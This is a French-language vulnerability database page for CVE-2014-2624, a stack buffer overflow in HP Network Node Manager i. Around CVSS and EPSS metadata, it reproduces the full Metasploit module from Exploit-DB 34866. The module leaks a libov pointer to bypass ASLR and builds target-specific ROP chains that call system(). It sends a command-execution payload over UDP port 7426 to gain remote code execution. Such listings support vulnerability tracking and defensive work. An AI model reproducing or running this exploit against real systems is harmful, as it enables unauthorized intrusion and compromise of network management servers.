Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE Other |
No informations. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
10 |
|
AV:N/AC:L/Au:N/C:C/I:C/A:C |
nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 34866
Date de publication : 2014-10-01 22h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Network Node Manager I PMD Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP Network Node Manager I (NNMi). The
vulnerability exists in the pmd service, due to the insecure usage of functions like
strcpy and strcat while handling stack_option packets with user controlled data. In
order to bypass ASLR this module uses a proto_tbl packet to leak an libov pointer from
the stack and finally build the rop chain to avoid NX.
},
'Author' =>
[
'd(-_-)b', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '2014-2624'],
['ZDI', '14-305']
],
'Payload' =>
{
'BadChars' => "\x00",
'Space' => 3000,
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic python perl openssl bash-tcp gawk'
}
},
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Targets' =>
[
['Automatic', {}],
['HP NNMi 9.10 / CentOS 5',
{
# ptr to .rodata with format specifier
#.rodata:0003BE86 aS_1 db '%s',0
'ov_offset' => 0x3BE86,
:rop => :rop_hp_nnmi_9_10
}
],
['HP NNMi 9.20 / CentOS 6',
{
# ptr to .rodata with format specifier
#.rodata:0003C2D6 aS_1 db '%s',0
'ov_offset' => 0x3c2d8,
:rop => :rop_hp_nnmi_9_20
}
]
],
'Privileged' => false, # true for HP NNMi 9.10, false for HP NNMi 9.20
'DisclosureDate' => 'Sep 09 2014',
'DefaultTarget' => 0
))
register_options([ Opt::RPORT(7426) ], self.class)
end
def check
header = [
0x2a5, # pmdmgr_init pkt
0x3cc, # signature
0xa0c, # signature
0xca8 # signature
].pack("V")
data = "\x00" * (0xfa4 - header.length)
pkt = header + data
connect_udp
udp_sock.put(pkt)
res = udp_sock.timed_read(8, 1)
if res.blank?
# To mitigate MacOSX udp sockets behavior
# see https://dev.metasploit.com/redmine/issues/7480
udp_sock.put(pkt)
res = udp_sock.timed_read(8)
end
disconnect_udp
if res.blank?
return Exploit::CheckCode::Unknown
elsif res.length == 8 && res.unpack("V").first == 0x2a5
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Unknown
end
end
def exploit
connect_udp
# info leak with a "proto_tbl" packet
print_status("Sending a 'proto_tbl' request...")
udp_sock.put(proto_tbl_pkt)
res = udp_sock.timed_read(13964, 1)
if res.blank?
# To mitigate MacOSX udp sockets behavior
# see https://dev.metasploit.com/redmine/issues/7480
udp_sock.put(proto_tbl_pkt)
res = udp_sock.timed_read(13964)
end
if res.blank?
fail_with(Failure::Unknown, "Unable to get a 'proto_tbl' response...")
end
if target.name == 'Automatic'
print_status("Fingerprinting target...")
my_target = auto_target(res)
fail_with(Failure::NoTarget, "Unable to autodetect target...") if my_target.nil?
else
my_target = target
fail_with(Failure::Unknown, "Unable to leak libov base address...") unless find_ov_base(my_target, res)
end
print_good("Exploiting #{my_target.name} with libov base address at 0x#{@ov_base.to_s(16)}...")
# exploit with a "stack_option_pkt" packet
udp_sock.put(stack_option_pkt(my_target, @ov_base))
disconnect_udp
end
def rop_hp_nnmi_9_10(ov_base)
rop = rand_text_alpha(775)
rop << [0x808d7c1].pack("V") # pop ebx ; pop ebp ; ret
rop << [ov_base + 0x481A8].pack("V") # ebx: libov .got
rop << [0x8096540].pack("V") # ptr to .data where user controlled string will be stored:
# "PMD Stack option specified, but stack not available (user_controlled)"
rop << [0x808d7c2].pack("V") # pop ebp # ret
rop << [0x08096540 + 4732].pack("V") # ebp: ptr to our controlled data in .data (+0x1028 to compensate)
rop << [ov_base + 0x1D692].pack("V") # ptr to 'call _system' sequence:
#.text:0001D692 lea eax, [ebp+dest]
#.text:0001D698 push eax ; command
#.text:0001D699 call _system
rop
end
def rop_hp_nnmi_9_20(ov_base)
rop = rand_text_alpha(775)
rop << [0x808dd70].pack("V") # pop eax ; pop ebx ; pop ebp ; ret
rop << [0xf7f61cd0 + ov_base + 0x1dae6].pack("V") # eax: ptr to 'call _system' sequence
#.text:0001DAE6 lea eax, [ebp+dest] (dest = -0x1028)
#.text:0001DAEC push eax ; command
#.text:0001DAED call _system
rop << [0x08097160].pack("V") # ebx: ptr to .data where user controlled string will be stored:
# "PMD Stack option specified, but stack not available (user_controlled)"
rop << rand_text_alpha(4) # ebp: padding
rop << [0x804fb86].pack("V") # add eax 0x809e330 ; add ecx ecx ; ret (control eax)
rop << [0x8049ac4].pack("V") # xchg eax, edi ; ret
rop << [0x808dd70].pack("V") # pop eax ; pop ebx ; pop ebp ; ret
rop << [0xf7f61cd0 + ov_base + 0x47f1c].pack("V") # eax: libov .got base
rop << rand_text_alpha(4) # ebx: padding
rop << [0x8097160 + 4764].pack("V") # ebp: ptr to our controlled data in .data (+0x1028 to compensate)
rop << [0x804fb86].pack("V") # add eax 0x809e330 ; add ecx ecx ; ret (control eax)
rop << [0x805a58d].pack("V") # xchg ebx eax ; and eax 0xc4830001 ; and cl cl ; ret (ebx: libov .got)
rop << [0x8049ac4].pack("V") # xchg eax, edi ; ret ; (eax: call to system sequence from libov)
rop << [0x80528BC].pack("V") # jmp eax
rop
end
def stack_option_pkt(t, ov_base)
hdr = [0x2a9].pack("V") # stack_option packet
data = "-SA" # stack name (invalid one 'A')
data << ";" # separator
data << self.send(t[:rop], ov_base) # malformed stack options
data << payload.encoded
data << ";\n"
data << "\x00" * (0xfa4 - data.length - hdr.length)
hdr + data
end
def proto_tbl_pkt
hdr = [0x2aa].pack("V") # proto_tbl packet
data = "\x00" * (0xfa4 - hdr.length)
hdr + data
end
def base(address, offset)
address - offset
end
def find_ov_base(t, data)
print_status("Searching #{t.name} pointers...")
i = 0
data.unpack("V*").each do |int|
if base(int, t['ov_offset']) % 0x1000 == 0
print_status("Pointer 0x#{int.to_s(16)} found at offset #{i * 4}")
@ov_base = base(int, t['ov_offset'])
return true
end
i = i + 1
end
false
end
def auto_target(data)
targets.each do |t|
next if t.name == 'Automatic'
if find_ov_base(t, data)
return t
end
end
nil
end
end
Products Mentioned
Configuraton 0
Hp>>Network_node_manager_i >> Version 9.0
Hp>>Network_node_manager_i >> Version 9.10
Hp>>Network_node_manager_i >> Version 9.20
Références